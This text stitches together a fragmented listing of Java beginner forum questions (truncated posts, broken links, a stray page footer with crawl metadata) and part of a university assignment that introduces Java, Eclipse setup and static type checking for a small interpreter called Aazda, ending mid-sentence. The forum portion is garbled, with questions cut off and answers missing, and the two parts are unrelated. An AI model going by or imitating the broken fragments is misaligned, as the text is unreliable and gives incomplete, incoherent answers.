// TODO Auto-generated method stubline and replace it with your code.
You can try running your program (which won't do anything yet) by selecting Warmup (which should be the only class listed there).
When it runs, you should see a Console window at the bottom of your workbench. You won't see anything there yet, since the main method is empty, but as you modify the code for the exercises will see the output there when your program runs.
public void println(String x)provided by the java.io.PrintStream class. Note that unlike main above, this method is not declared using static! That means, it must be invoked on an Object. Try using just, println("Hello"); in Eclipse to see what happens.
There is a built-in PrintStream object that corresponds to the visible stream the user sees. It is called System.out. So, to print a message to the output console, you need to do something like:
System.out.println("Printing in Java is much harder than in Scheme or Python!");
Try this yourself first, but if you are stuck use the hints below.
Declaration of factorial method:
public static int factorial(int n) {
// YOUR CODE HERE
}
Test code in main:
public static void main(String[] args) {
for (int i = 1; i < 20; i++) {
System.out.println("factorial(" + i + ") = " + factorial(i));
}
}
Unlike in Scheme and Python where numbers are represented in a complex way to be able to hold very large values, in Java the int type is a fixed 32-bit value. It can only hold a fixed range of values (from -2147483648 to 2147483647). If the result exceeds 2147483648, Java just wraps around to the negative numbers without producing any error. So, the value of 2147483647 + 1 in Java is -2147483648.
Java provides several different ways for managing collections, but nothing that is very similar to Scheme or Python lists. The closest thing in Java to a mutable list is the ArrayList<E> class. To use the ArrayList class, you need to include:
import java.util.ArrayList;near the beginning of your Java file (if there is a package statement, it needs to be after that).
Because of explicit static typing in Java, we cannot have lists where the elements can be any type, as we do in Scheme and Java. Instead, we need to explicitly declare the type of each list element as a type parameter to the ArrayList. For example, ArrayList<String> denotes a list where each element is a String. The most general list is ArrayList<Object> where each element is an Object. All object classes in Java are subtypes of Object, so this is a list that can contain elements of any object type. But, not everything in Java is an object (for example, an int number is not an object), so the list elements still cannot be any value.
The ArrayList class provides a constructor for creating an empty list:
ArrayList<String> slist = new ArrayList<String>();The add(Element Type) method appends to an ArrayList:
slist.add("first"); slist.add("second"); slist.add(3); // Compile-time type error: only String elements may be added to an ArrayList<String>The get(int index) method is similar to slist[index] in Python:
String first = slist.get(0); // gets first element of list String second = slist.get(1); String missing = slist.get(3); // Run-time error: no element at index 3The set(int index, element) method is similar slist[index] = element in Python:
slist.set(0, "primul"); slist.set(1, "ikinci"); slist.set(2, "terceiro"); // Run-time error: can only use set to update existing elementsThe size() method returns the number of elements in the list:
int elements = slist.size();
ArrayList<Object> a = new ArrayList<Object>(); a.add("one"); a.add("two"); a.add("three"); listReverse(a); System.out.println("After a = " + a);Note that we can put a String object in our ArrayList<Object> since String is a subtype of Object. If S is a subtype of T we can use a value of type S anywhere a value of type T is expected.
For the rest of this assignment, you will modify the Aazda interpreter implemenetation we provide to implement some additional functionality and add static type checking. For Part 1 (due on Tuesday, 22 November), you modify the interpreter to add support for mutation (including the begin special form). For Part 2 (due on Monday, 5 December, the last day of class), you modify the interpreter to add static type checking.
/* Modified for Question [N] */ your changed code /* End Modifications for Question [N]*/
To start withing with Aazda, select File | Import in Eclipse. In the import dialog, select General | Existing Projects into Workspace. Then, Select Archive File and use Browse to find the ps8.zip file. Then, select Finish to import the project. After this, you should see the project aazda in your workspace.
You can try running the aazda interpreter by selecting the aazda project and REPL for the read-eval-print loop class.
When it runs, you should see a Console window at the bottom of your workbench. The Hiss> prompt is for entering Aazda expressions or definitions to evaluate. Try evaluating a few expressions. You should be able to evaluate anything that you could evaluate in the Charme interpreter from PS7 (although the Aazda interpreter does not implement memoizing, so don't expect to be able to evaluate (fibo 60).)
The code is divided into separate .java files for each class. Expand the aazda project, src directory, and aazda package to see the Java files. The provided files include:
All of the changes you need to make for Problems 5 and 6 should be in Evaluator.java and Environment.java.
First, add set! to the Aazda interpreter. Note the set! must be a special form since the first operand is not evaluated normally: instead of obtaining its value, we need to use it to identify the place to update. It would be a good idea to make sure you understand how definitions are evaluated before implementing set!.
The Environment class uses HashMap<String, SVal> to represent a frame. A HashMap is similar to a Python dictionary (except that the key and value types must be specified explicitly). The put(key, value) method provides a way to add or update the value associated with a key in the HashMap.
Hiss> (define a 3) Hiss> (set! a (+ a 1)) Hiss> a 4Also, make sure you assignment still works when the variable is defined in a parent environment instead of the current execution environment:
Hiss> (define update-a (lambda () (set! a (+ a 1)))) Hiss> (update-a) Hiss> a 5
Hiss> (define counter 0) Hiss> (define update-counter! (lambda () (begin (set! counter (+ 1 counter)) counter))) Hiss> (update-counter!) 1 Hiss> (update-counter!) 2
Professor Evans,
I finished the problem set and was trying to submit. However, when I clicked the submission link it was broken. It returned the error “URL not found on server”.
Sorry, it wasn’t up yet! It is up now. There are no test cases for this assignment, but use the form at to submit your code.
I’m sorry, I don’t really understand…So do we need to include all the code that we wrote for Warmup.java into the code for Evaluator.java?
No, this is a mistake (I think you mean the part where it says problems 2 and 3 should modify Evaluator.java and Environment.java). You should keep Warmup.java as it is, and just submit that as a separate file. Sorry for the confusion. | http://www.cs.virginia.edu/~evans/cs1120-f11/problem-sets/problem-set-8-draft-j-from-aazda-to-aazda | CC-MAIN-2017-17 | refinedweb | 2,271 | 64.1 |
NAME
X509_cmp, X509_NAME_cmp, X509_issuer_and_serial_cmp, X509_issuer_name_cmp, X509_subject_name_cmp, X509_CRL_cmp, X509_CRL_match - compare X509 certificates and related values
SYNOPSIS
#include <openssl/x509.h> int X509_cmp(const X509 *a, const X509 *b); int X509_NAME_cmp(const X509_NAME *a, const X509_NAME *b); int X509_issuer_and_serial_cmp(const X509 *a, const X509 *b); int X509_issuer_name_cmp(const X509 *a, const X509 *b); int X509_subject_name_cmp(const X509 *a, const X509 *b); int X509_CRL_cmp(const X509_CRL *a, const X509_CRL *b); int X509_CRL_match(const X509_CRL *a, const X509_CRL *b);
DESCRIPTION
This set of functions are used to compare X509 objects, including X509 certificates, X509 CRL objects and various values in an X509 certificate.
The X509_cmp() function compares two X509 objects indicated by parameters a and b. The comparison is based on the memcmp result of the hash values of two X509 objects and the canonical (DER) encoding values.
The X509_NAME_cmp() function compares two X509_NAME objects indicated by parameters a and b, any of which may be NULL. The comparison is based on the memcmp result of the canonical (DER) encoding values of the two objects using i2d_X509_NAME(3). This procedure adheres to the matching rules for Distinguished Names (DN) given in RFC 4517 section 4.2.15 and RFC 5280 section 7.1. In particular, the order of Relative Distinguished Names (RDNs) is relevant. On the other hand, if an RDN is multi-valued, i.e., it contains a set of AttributeValueAssertions (AVAs), its members are effectively not ordered.
The X509_issuer_and_serial_cmp() function compares the serial number and issuer values in the given X509 objects a and b.
The X509_issuer_name_cmp(), X509_subject_name_cmp() and X509_CRL_cmp() functions are effectively wrappers of the X509_NAME_cmp() function. These functions compare issuer names and subject names of the objects, or issuers of X509_CRL objects, respectively.
The X509_CRL_match() function compares two X509_CRL objects. Unlike the X509_CRL_cmp() function, this function compares the whole CRL content instead of just the issuer name.
RETURN VALUES
The X509 comparison functions return -1, 0, or 1 if object a is found to be less than, to match, or be greater than object b, respectively.
X509_NAME_cmp(), X509_issuer_and_serial_cmp(), X509_issuer_name_cmp(), X509_subject_name_cmp(), X509_CRL_cmp(), and X509_CRL_match() may return -2 to indicate an error.
NOTES
These functions in fact utilize the underlying memcmp of the C library to do the comparison job. Data to be compared varies from DER encoding data, hash value or ASN1_STRING. The sign of the comparison can be used to order the objects but it does not have a special meaning in some cases.
X509_NAME_cmp() and wrappers utilize the value -2 to indicate errors in some circumstances, which could cause confusion for the applications.
SEE ALSO
i2d_X509_NAME(3), i2d_X509(3)
Licensed under the Apache License 2.0 (the "License"). You may not use this file except in compliance with the License. You can obtain a copy in the file LICENSE in the source distribution or at. | https://www.openssl.org/docs/manmaster/man3/X509_cmp.html | CC-MAIN-2022-40 | refinedweb | 466 | 54.02 |
Java, J2EE & SOA Certification Training
- 32k Enrolled Learners
- Weekend
- Live Class
Object-Oriented Programming or better known as OOPs is one of the major pillars of Java that has leveraged its power and ease of usage. To become a professional Java developer, you must get a flawless control over the various Java OOPs concepts like Inheritance, Abstraction, Encapsulation, and Polymorphism. Through the medium of this article, I will give you a complete insight into one of the most important concepts of OOPs i.e Encapsulation in Java and how it is achieved.
Below are the topics, I will be discussing in this article:
You may also go through this recording of OOPs Concepts where you can understand the topics in a detailed manner with examples.
Encapsulation refers to wrapping up of data under a single unit. It is the mechanism that binds code and the data it manipulates. Another way to think about encapsulation is, it is a protective shield that prevents the data from being accessed by the code outside this shield. In this, the variables or data of a class is hidden from any other class and can be accessed only through any member function of own class in which they are declared.
Now, let’s take the example of a medical capsule, where the drug is always safe inside the capsule. Similarly, through encapsulation, the methods and variables of a class are well hidden and safe.
Encapsulation in Java can be achieved by:
Now, let’s look at the code to get a better understanding of encapsulation:
public class Student { private String name; public String getName() { return name; } public void setName(String name) { this.name = name; } } class Test{ public static void main(String[] args) { Student s=new Student(); s.setName("Harry Potter"); System.out.println(s.getName()); } }
As you can see in the above code, I have created a class Student which has a private variable name. Next, I have created a getter and setter to get and set the name of a student. With the help of these methods, any class which wishes to access the name variable has to do it using these getter and setter methods.
Now let’s see one more example and understand Encapsulation in depth. In this example, the Car class has two fields –name and topSpeed. Here, both are declared as private, meaning they can not be accessed directly outside the class. We have some getter and setter methods like getName, setName, setTopSpeed etc., and they are declared as public. These methods are exposed to “outsiders” and can be used to change and retrieve data from the Car object. We have one method to set the top speed of the vehicle and two getter methods to retrieve the max speed value either in MPH or KMHt. So basically, this is what encapsulation does – it hides the implementation and gives us the values we want. Now, let’s look at the code below.
package Edureka; public class Car { private String name; private double topSpeed; public Car() {} public String getName(){ return name; } public void setName(String name){ this.name= name; } public void setTopSpeed(double speedMPH){ topSpeed = speedMPH; } public double getTopSpeedMPH(){ return topSpeed; } public double getTopSpeedKMH(){ return topSpeed*1.609344; } }
Here, the main program creates a Car object with a given name and uses the setter method to store the top speed for this instance. By doing this, we can easily get the speed in MPH or KMH without caring about how speed is converted in the Car class.
package Edureka; public class Example{ public static void main(String args[]) Car car =new Car(); car.setName("Mustang GT 4.8-litre V8"); car.setTopSpeed(201); System.out.println(car.getName()+ " top speed in MPH is " + car.getTopSpeedMPH()); System.out.println(car.getName() + " top speed in KMH is " + car.getTopSpeedKMH());
So, this is how Encapsulation can be achieved in Java. Now, let’s move further and see why do we need Encapsulation.
Encapsulation is essential in Java because:
Now, let’s consider a small example that illustrates the need for encapsulation.
class Student { int id; String name; } public class Demo { public static void main(String[] args) { Student s = new Student(); s.id = 0; s.name=""; s.name=null; } }
In the above example, it contains two instance variables as access modifier. So any class within the same package can assign and change values of those variables by creating an object of that class. Thus, we don’t have control over the values stored in the Student class as variables. In order to solve this problem, we encapsulate the Student class.
So, these were the few pointers that depict the need of Encapsulation. Now, let’s see some benefits of encapsulation.
Now that we have understood the fundamentals of encapsulation, let’s dive into the last topic of this article and understand Encapsulation in detail with the help of a real-time example.
Let’s consider a television example and understand how internal implementation details are hidden from the outside class. Basically, in this example, we are hiding inner code data i.e. circuits from the external world by the cover. Now in Java, this can be achieved with the help of access modifiers. Access modifiers set the access or level of a class, constructors variables etc. As you can see in the below code, I have used private access modifier to restrict the access level of the class. Variables declared as private are accessible only within Television class.
public class Television{ private double width; private double height; private double Screensize; private int maxVolume; print int volume; private boolean power; public Television(double width, double height, double screenSize) { this.width=width; this.height=height; this.screenSize=ScreenSize; } public double channelTuning(int channel){ switch(channel){ case1: return 34.56; case2: return 54.89; case3: return 73.89; case1: return 94.98; }return 0; } public int decreaseVolume(){ if(0<volume) volume --; return volume; } public void powerSwitch(){ this.power=!power; } public int increaseVolume(){ if(maxVolume>volume) volume++; return volume; } } class test{ public static void main(String args[]){ Television t= new Television(11.5,7,9); t.powerSwitch(); t.channelTuning(2); t.decreaseVolume(); t.increaseVolume(); television.width=12; // Throws error as variable is private and cannot be accessed outside the class } }
In the above example, I have declared all the variables as private and methods, constructors and class as public. Here, constructors, methods can be accessed outside the class. When I create an object of Television class, it can access the methods and constructors present in the class, whereas variables declared with private access modifier are hidden. That’s why when you try to access width variable in the above example, it throws an error. That’s how internal implementation details are hidden from the other classes. This is how Encapsulation is achieved in Java.
This brings us to the end of this article on “Encapsulation in Java”. Hope, you found it informative and it helped in adding value to your knowledge. If you wish to learn more about Java, you can refer to the Advanced Java Tutorial.
Now that you have understood “what is Encapsulation in Java”, “Encapsulation in Java” blog and we will get back to you as soon as possible. | https://www.edureka.co/blog/encapsulation-in-java/ | CC-MAIN-2019-39 | refinedweb | 1,203 | 55.44 |
Journal tools |
Personal search form |
My account |
Bookmark |
Search:
... anything else murmured dorian american red cross st louis chapter . About her husband she wants his desires or disable regedit in...unlucky beater about your not being texas boat show . Best of fellows but of but...you would understand me deal on european cruise . Least--is never very ready. Have ... into. Cigarette and walked over washington river level . Water's silent silver the boldness...
... nj motel
continuing division education louis riel school winnipeg
animalia classifications...t pick your nose
ohio river boat tour
billingsley peter
new...positive attitude quiz
alaskan american cruise holland
de movistar plane tarifas...bono lawyers
principal health centre st albans
picture of indian plant...pole dancing courses in london
river belle path
animal basin desert...
...
any contact have if please question river top us
texas department of banking
... alternative medicine animal health
minnesota vikings cruise ship
aaa discount
physical therapy ... real estate
new jersey clinic
minnesota boat insurance
hawaiian girls bedding
community legal...b yeats poem
washington university in st. louis missouri
texas association of realtor...
... to see in paris france
boat boat broker floridayachtsinternational.net sale...acupuncture
custom lower units for boat motors
asia rental vacation
james...autumn review
discount discount cheap cruise travel
sid meiers pirate cheats...forums
job quote form
little river elementary school virginia
martin truex...number
new york messenger services
st louis mo business phone system...
...
chair cognac executive lane leather
boat 3d model
new mexico game ... code
gunshop cafe brisbane
casino boat cruises
reducing balance depreciation method...access remote pc keygen
rhine river valley
1997 gmc jimmy parts... online
newport beach harbor dinner cruise
dancing latin dances
code dance...bank stocks
time for dinner st. louis
student vacation deals
panasonic...
... go anime downloads
american cancer society st louis
2006 award fashion globe golden
... insurance co.
the fiery furnaces blueberry boat lyrics
eagle house jackson mountain nh... american
direct deposit form navy
disney cruise 2007
bisquick breakfast casseroles
rosamond high ...riverwalk dinner cruises
ah64d longbow
colorado river rafting trips
2001 nissan pathfinder se ...
... procedures sql server 2000
cheep cruise spain travel
schreiber company
crew ...a computer processor
grand valley st university
beaver funny hat kid...angel de enamorado un
party boat deep sea fishing
springhouse production...course golf meadow mountain
red river ski valley
children hospital los...license game
the fox theatre st louis mo nhmqacfurels
simhutqetqa
nrctrricplr...
... real name
arizona city map yuma
st martin airplane landing
atlanta insurance jobs... resort
gordon river cruise strahan
charis games
jaffe lighting st. louis
indiana passports...new york islander logo
cassville lodge river roaring
trolley rentals in philadelphia
edelbrock ...flo efi system
lottrey results
glastron boat review
department health hygiene maryland mental...
...roque golf spain
expedition missouri river
missouri real estate records
2005...canon copier pc980
brendan cruise line river
news rock starved
can...activation rate
eating healthy lifestyle
louis licari
foothill golf
hawaii time...high schools
florida rent a boat
mars bar nutritional info
time...xp
ballroom dancing classes in st louis
area member
washingtonian dc...
...
african american buying power
cool river cafe denver
african animals coloring ... learning foreign language
winter park boat rides
import car custom part
... free
michigan shelby township
genesee river map
deformed extra frog grow ... and associates
park forest apartments st. louis
online kindergarten readiness test...tv
mario games.com
pablo cruise love will find a way...
Car Rental
College
St Croix River Boat Cruise
Health Insurance
New Orleans River Boat Cruises
Hotel St Louis
Boat Sale St Louis
Inc
Boat Dealer St Louis
Life Insurance
Boat Dealer St Louis Mo
Loans
Savannah River Boat Cruises
Office
Connecticut River Boat Cruise
Renters Insurance
Mississippi River Boat Cruises
Restaurant St Louis
Riverboat Dinner Cruise St Louis
Second Mortgage
Result Page:
1
2
3
4
5
6
7
8
9
for River Boat Cruise St Louis | http://www.ljseek.com/River-Boat-Cruise-St-Louis_s4Zp1.html | crawl-002 | refinedweb | 635 | 52.15 |
procmgr_event_notify()
Ask to be notified of system-wide events
Synopsis:
#include <sys/procmgr.h> int procmgr_event_notify ( unsigned flags, const struct sigevent * event );
Since:
BlackBerry 10.0.0
Arguments:
- flags
- A bitwise OR of the type of events that you want to be notified of, or 0 to unarm the sigevent. The event types include:
- PROCMGR_EVENT_CONFSTR
- PROCMGR_EVENT_DAEMON_DEATH
- PROCMGR_EVENT_PATHSPACE
- PROCMGR_EVENT_SYNC
- PROCMGR_EVENT_SYSCONF
- PROCMGR_EVENT_TOD
For more information, see " Event types," below.
- event
- A pointer to a sigevent structure that specifies how you want to be notified.
Library:
libc
Use the -l c option to qcc to link against this library. This library is usually included automatically.
Description:
The procmgr_event_notify() function requests that the process manager notify the caller of the system-wide events identified by the given flags.
This function lets you add a single notification request for the process. If you call it again, the new request replaces the previous one. If you want to your process to have more than one notification request, use procmgr_event_notify_add() and procmgr_event_notify_delete() instead.
To remove the current notification request, pass a value of 0 for flags.
Event types
The following event types are defined in <sys/procmgr.h>:
- PROCMGR_EVENT_CONFSTR
- A process set a configuration string.
- PROCMGR_EVENT_DAEMON_DEATH
- A process in session 1 died. This event is most useful for watching for the death of daemon processes that use procmgr_daemon() to put themselves in session 1 as well as close and redirect file descriptors. As a result of this closing and redirecting, the death of daemons is difficult to detect otherwise.
Notification is via the given event, so no information is provided as to which process died. Once you've received the event, you'll need to do something else to find out if processes you care about had died. You can do this by walking through the list of all processes, looking for specific process IDs or process names. If you don't find one, then it has died. The sample code below demonstrates how you can do this.
- PROCMGR_EVENT_PATHSPACE
- A resource manager added or removed an entry (i.e. mountpoint) to or from the pathname space. This is generally associated with resource manager calls to resmgr_attach() and resmgr_detach(). Terminating a resource manager process also generates this event if the mountpoints haven't been detached.
- PROCMGR_EVENT_SYNC
- A process called sync() to synchronize the filesystems.
- PROCMGR_EVENT_SYSCONF
- A process set a system configuration string.
- PROCMGR_EVENT_TOD
- A process changed the time of day by calling ClockTime() or clock_settime().
Returns:
-1 on error; any other value indicates success.
Examples:
/* * This demonstrates procmgr_event_notify(). */ #include <devctl.h> #include <dirent.h> #include <errno.h> #include <fcntl.h> #include <libgen.h> #include <stdio.h> #include <stdlib */ if (procmgr_event_notify( PROCMGR_EVENT_DAEMON_DEATH, &event ) == -1) { fprintf( stderr, "procmgr_event_notify()/as", pid ); if ((fd = open( buffer, O_RDONLY )) != NULL) {; }
Classification:
Last modified: 2014-06-24
Got questions about leaving a comment? Get answers from our Disqus FAQ.comments powered by Disqus | http://developer.blackberry.com/native/reference/core/com.qnx.doc.neutrino.lib_ref/topic/p/procmgr_event_notify.html | CC-MAIN-2015-27 | refinedweb | 478 | 59.9 |
Something Fun for the Holidays�Random Numbers & Tic Tac Toe
Random numbers are commonly employed in applications for a wide variety of reasons. In this week's letter let's take a quick look at the Random class in the Common Language Runtime.
The System Namespace
The System namespace is a root namespace in the Common Language Runtime (CLR). One of the classes in the System namespace is the Random class. (That's right! Random numbers are encapsulated in a class in .NET.) Like VB6 random numbers are based on a mathematical algorithm from a finite set of numbers. The result is that you get pseudo-random numbers, but these numbers are random enough for many practical purposes (just not the lottery).
The basic use of the Random class is to create an instance of the class and use the Random.Next method to acquire subsequent random numbers. You do not have to re-create the Random object each time you want a random number. The following fragments demonstrate several examples of creating Random objects and getting random numbers.
The first example creates a Random object and displays the first random number in a message box.
Dim R As New Random() MsgBox(R.Next().ToString())
The second example creates an instance of the Random class with a seed value of 100.
Dim R As New Random(100) Dim I As Integer = R.Next()
The third example creates a Random object, seeding the object from a time-related value and requests a number between 1 and 100, excluding the value 100.
Dim R As New Random(Now.Millisecond) R.Next(1, 100)
A simple Tic-Tac-Toe game is provided in the listing below, providing some more examples of using the Random class.
TicTacToe: Random Number Example
In keeping with the theme of this article, listing 1 contains a prototype of a Tic-Tac-Toe game (see figure). Just in case someone has forgotten, Tic-Tac-Toe is a simple game where players alternate turns, each player marking an empty square until all squares are marked or someone has three consecutive horizontal, vertical, or diagonal squares marked. If no player has three consecutive squares then the game is a Cats game.
The code is all implemented in a Windows application on a form. The computer player is as random as it can be (so everyone has a really good chance of winning).
Figure 1: Tic-Tac-Toe against a Random computer player.
Listing 1: Computer uses Random numbers to determine where to place "O".
1: Public Class Form1 2: Inherits System.Windows.Forms.Form 3: 4: [ Windows Form Designer generated code ] 5: 6: Private Sub Button2_Click(ByVal sender As System.Object, _ 7: ByVal e As System.EventArgs) Handles Button2.Click 8: Close() 9: End Sub 10: 11: Private Sub Initialize() 12: 13: Dim I As Integer 14: For I = 0 To Me.Controls.Count - 1 15: If (TypeOf Controls(I) Is Label) Then 16: Dim L As Label = Controls(I) 17: If (L.Tag <> Nothing) Then 18: L.Text = "" 19: Squares(L.Tag) = L 20: End If 21: End If 22: Next 23: 24: End Sub 25: 26: Private Random As System.Random 27: Private Turns As Integer = 0 28: Private Squares(8) As Label 29: Private UserTurn As Boolean = False 30: 31: Private Sub NewGame() 32: 33: Static UserFirst As Boolean = False 34: UserFirst = Not UserFirst 35: Initialize() 36: Random = New Random(Now.Millisecond) 37: Turns = 0 38: 39: If (UserFirst) Then 40: UserTurn = True 41: Else 42: UserTurn = False 43: ComputerTurn() 44: End If 45: End Sub 46: 47: Private Sub Button1_Click(ByVal sender As System.Object, _ 48: ByVal e As System.EventArgs) Handles Button1.Click 49: NewGame() 50: End Sub 51: 52: 53: Private Sub Form1_Load(ByVal sender As System.Object, _ 54: ByVal e As System.EventArgs) Handles MyBase.Load 55: 56: NewGame() 57: 58: End Sub 59: 60: Private Sub Label9_Click(ByVal sender As System.Object, _ 61: ByVal e As System.EventArgs) Handles Label1.Click, _ 62: Label2.Click, Label3.Click, Label4.Click, Label5.Click, _ 63: Label6.Click, Label7.Click, Label8.Click, Label9.Click 64: 65: If (Not UserTurn Or IsGameOver()) Then Exit Sub 66: 67: With CType(sender, Label) 68: If (.Text = "") Then 69: .Text = "X" 70: Turns += 1 71: 72: If (Not IsGameOver()) Then 73: UserTurn = False 74: ComputerTurn() 75: End If 76: Else 77: Beep() 78: End If 79: End With 80: 81: 82: End Sub 83: 84: Private Function TakeTurn(ByVal Turn As Integer) As Boolean 85: If (Squares(Turn).Text = "") Then 86: Squares(Turn).Text = "O" 87: Return True 88: Else 89: Return False 90: End If 91: End Function 92: 93: Private Sub ComputerTurn() 94: Dim Turn As Integer = Random.Next(0, 9) 95: 96: While (True) 97: If (TakeTurn(Turn)) Then Exit While 98: Application.DoEvents() 99: Turn = Random.Next(1, 9) 100: End While 101: 102: Turns += 1 103: IsGameOver() 104: UserTurn = True 105: 106: End Sub 107: 108: Private Overloads Function SquaresEqual( _ 109: ByVal First As Integer, _ 110: ByVal Second As Integer, _ 111: ByVal Third As Integer) As Boolean 112: 113: Return Squares(First).Text = Squares(Second).Text _ 114: And Squares(Second).Text = Squares(Third).Text _ 115: And Squares(First).Text <> "" 116: 117: End Function 118: 119: Private Overloads Function SquaresEqual(ByVal First As Integer, _ 120: ByVal Second As Integer, ByVal Third As Integer, _ 121: ByRef Value As String) As Boolean 122: 123: 124: Dim Result As Boolean 125: Result = SquaresEqual(First, Second, Third) 126: 127: If (Result) Then 128: Value = Squares(First).Text 129: End If 130: 131: Return Result 132: End Function 133: 134: 135: Private Function IsWinner( _ 136: Optional ByRef Value As String = "") As Boolean 137: 138: Return SquaresEqual(0, 1, 2, Value) Or _ 139: SquaresEqual(0, 3, 6, Value) Or _ 140: SquaresEqual(0, 4, 8, Value) Or _ 141: SquaresEqual(1, 4, 7, Value) Or _ 142: SquaresEqual(2, 5, 8, Value) Or _ 143: SquaresEqual(2, 4, 6, Value) Or _ 144: SquaresEqual(3, 4, 5, Value) Or _ 145: SquaresEqual(6, 7, 8, Value) 146: 147: End Function 148: 149: Private Sub ScoreGame() 150: Dim Value As String = "" 151: If (IsWinner(Value)) Then 152: MsgBox(Value & " is the winner!") 153: Else 154: MsgBox("Cats Game!") 155: End If 156: End Sub 157: 158: Private Function IsGameOver() As Boolean 159: 160: If (Turns >= 9 Or IsWinner()) Then 161: ScoreGame() 162: Return True 163: Else 164: Return False 165: End If 166: 167: End Function 168: 169: End Class
Line 26 declares an uninitialized Random member named Random. Line 36 constructs a Random object, seeding with the number of milliseconds for the current time value, every time a new game is started. Line 94 requests a random number between 0 and 9, including 0 and excluding 9. This represents the 9 possible spaces on the Tic-Tac-Toe board. Line 94 is included in the ComputerTurn method. The computer tries random numbers between 0 and 9 until it finds an empty square to place it's O. After each player's turn the game checks to see if the game is over. If all squares are marked or a player has won then the game is scored..
There are no comments yet. Be the first to comment! | http://www.codeguru.com/columns/vb/article.php/c6555/Something-Fun-for-the-HolidaysmdashRandom-Numbers--Tic-Tac-Toe.htm | CC-MAIN-2015-11 | refinedweb | 1,228 | 63.39 |
.
In reality, I don’t often write components from scratch in a TDD way, however
I will often use TDD to replicate an existing bug in a component to first see
the bug in action, and then fixing it. Feedback via test results on the
command line is often much quicker than browser refreshes and manual
interactions, so writing tests can be a very productive way to improve or fix
a component’s behaviour.
Set up
I’ll be using a brand new React app for this tutorial, which I’ve created with
create-react-app. This
comes complete with Jest, a test runner
built and maintained by Facebook.
There’s one more dependency we’ll need for now –
Enzyme. Enzyme is a suite of test utilities
for testing React that makes it incredibly easy to render, search and make
assertions on your components, and we’ll use it extensively today. Enzyme also
needs react-test-renderer to be installed (it doesn’t have it as an explicit
dependency because it only needs it for apps using React 15.5 or above, which we
are). In addition, the newest version of Enzyme uses an adapter based system
where we have to install the adapter for our version of React. We’re rocking
React 16 so I’ll install the adapter too:
yarn add -D enzyme react-test-renderer enzyme-adapter-react-16
The -D argument tells Yarn to save these dependencies as developer
dependencies.
You can read more about
installing Enzyme in the docs.
Enzyme setup
You also need to perform a small amount of setup for Enzyme to configure it to
use the right adapter. This is all documented in the link above; but when we’re
working with an application created by create-react-app, all we have to do is
create the file src/setupTests.js. create-react-app is automatically
configured to run this file before any of our tests.
import { configure } from ‘enzyme’
import Adapter from ‘enzyme-adapter-react-16’
configure({ adapter: new Adapter() })
If you’re using an older version of React in your projects but still want to
use Enzyme, make sure you use the right Enzyme adapter for the version of
React you’re using. You can find more on the
Enzyme installation docs.
create-react-app is configured to run this file for us automatically when we run
yarn test, so before our tests are run it will be executed and set up Enzyme
correctly.
If you’re not using create-react-app, you can configure Jest yourself to run
this file using the
setupTestFrameworkScriptFile
configuration option.
The Hello component
Let’s build a component that takes a name prop and renders
Hello,
name!</p> onto the screen. As we’re writing tests first, I’ll create
src/Hello.test.js, following the convention for test files that
create-react-app uses (in your own apps you can use whichever convention you
prefer). Here’s our first test:
import React from ‘react’
import Hello from ‘./Hello’
import { shallow } from ‘enzyme’
it(‘renders’, () => {
const wrapper = shallow(<Hello name=”Jack" />)
expect(wrapper.find(‘p’).text()).toEqual(‘Hello, Jack!’)
})
We use Enzyme’s
shallow rendering API.
Shallow rendering will only render one level of components deep (that is, if our
Hello component rendered the Foo component, it would not be rendered). This
helps you test in isolation and should be your first point of call for testing
React components.
You can run yarn test in a React app to run it and have it rerun on changes.
If you do that now, you’ll see our first error:
Cannot find module ‘./Hello’ from ‘Hello.test.js’
So let’s at least define the component and give it a shell that renders nothing:
import React from ‘react’
const Hello = props => {
return null
}
export default Hello
Now we get a slightly cryptic error:
Method “text” is only meant to be run on a single node. 0 found instead.
Once you’ve used Enzyme a couple of times this becomes much clearer; this is
happening because we’re calling wrapper.find(‘p’) and then calling text() on
that to get the text, but the component is not rendering a paragraph. Let’s fix
that:
const Hello = props => {
return <p>Hello World</p>
}
Now we’re much closer!
expect(received).toEqual(expected)
Expected value to equal:
"Hello, Jack!"
Received:
"Hello World"
And we can make the final leap to a green test:
const Hello = props => {
return <p>Hello, {props.name}!</p>
}
Next up, let’s write a test to ensure that if we don’t pass in a name, it
defaults to “Unknown”. At this point I’ll also update our first test, because
it(‘renders’, …) is not very descriptive. It’s good to not care too much
about the name of the first test you write, and focus on the implementation, but
once you’re more comfortable with what you’re testing and beginning to expand
your test suite, you should make sure you keep things organised.
With our second test, we’re failing again:
it(‘renders the name given’, () => {…})
it(‘uses "Unknown" if no name is passed in’, () => {
const wrapper = shallow(<Hello />);
expect(wrapper.find(‘p’).text()).toEqual(‘Hello, Unknown!’);
});
expect(received).toEqual(expected)
Expected value to equal:
"Hello, Unknown!"
Received:
"Hello, !"
But we can now write our first pass at the implementation to fix it:
const Hello = props => {
return <p>Hello, {props.name || ‘Unknown’}!</p>
}
And now the test is green we’re free to refactor. The above is perfectly fine
but not the way it’s usually done in React. Some might choose to destructure the
props argument and give name a default value:
const Hello = ({ name = ‘Unknown’ }) => {
return <p>Hello, {name}!</p>
}
But most of the time when working with React components I’ll use the
defaultProps object to define the defaults. I’ll also set the component’s
propTypes:
import React from ‘react’
import PropTypes from ‘prop-types’
const Hello = props => {
return <p>Hello, {props.name}!</p>
}
Hello.propTypes = {
name: PropTypes.string,
}
Hello.defaultProps = {
name: ‘Unknown’,
}
export default Hello
And all our tests are still passing.
Conclusion
That brings our first look at testing React with Enzyme 3 to an end. In future
tutorials we’ll dive further into what Enzyme has to offer and see how we can
test components of increasing complexity.
Link: | https://jsobject.info/2017/12/12/an-introduction-to-testing-react-components-with-enzyme-3/ | CC-MAIN-2019-18 | refinedweb | 1,063 | 61.36 |
Editor's Note: This article has a followup in Advanced Subroutine Techniques.
A subroutine (or routine, function, procedure, macro, etc.) is, at its heart, a named chunk of work. It's shorthand that allows you to think about your problem in bigger chunks. Bigger chunks means two things:
- You can break the problem up into smaller problems that you can solve independently.
- You can use these solutions to solve your overall problem with greater confidence.
Well-written subroutines will make your programs smaller (in lines and memory), faster (both in writing and executing), less buggy, and easier to modify.
You're Kidding, Right?
Consider this: when you lift your sandwich to take a bite, you don't think about all the work that goes into contracting your muscles and coordinating your movements so that the mayo doesn't end up in your hair. You, in essence, execute a series of subroutines that say "Lift the sandwich up to my mouth and take a bite of it, then put it back down on the plate." If you had to think about all of your muscle contractions and coordinating them every time you wanted to take a bite, you'd starve to death.
